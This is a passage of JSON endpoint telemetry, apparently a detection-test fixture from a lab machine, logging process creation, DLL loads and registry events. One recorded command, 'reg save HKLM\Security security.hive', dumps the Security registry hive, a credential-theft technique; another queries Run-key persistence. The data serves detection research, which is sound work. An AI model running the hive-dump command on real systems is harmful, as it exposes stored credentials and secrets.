"C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315270000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315270000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315270000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "process", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571315270000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "process", - "pid": 3496, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571315270000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4548, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571315880000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4548, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4548, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4548, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4548, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4548, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" - }, - { - "command_line": "reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 888, - "ppid": 4548, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571316110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "process", - "pid": 888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" - }, - { - "event_type": "process", - "pid": 4548, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg save HKLM\\Security security.hive\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 132, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571316290000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571316210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" - }, - { - "command_line": "reg save HKLM\\Security security.hive", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6700, - "ppid": 132, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571316430000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001016D25001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", - "registry_value": "418A073AA3BC3475", - "timestamp": 131883571421830000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883571447460000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883571447460000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571449020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571449020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571449020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", - "registry_value": "418A073AA3BC3475", - "timestamp": 131883571467310016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications\\41C64E6DA314B055", - "registry_value": "41C64E6DA314B055", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{9c8ac93b-a8c5-49d7-a478-c0f618a522de}", - "registry_value": "{9c8ac93b-a8c5-49d7-a478-c0f618a522de}", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": 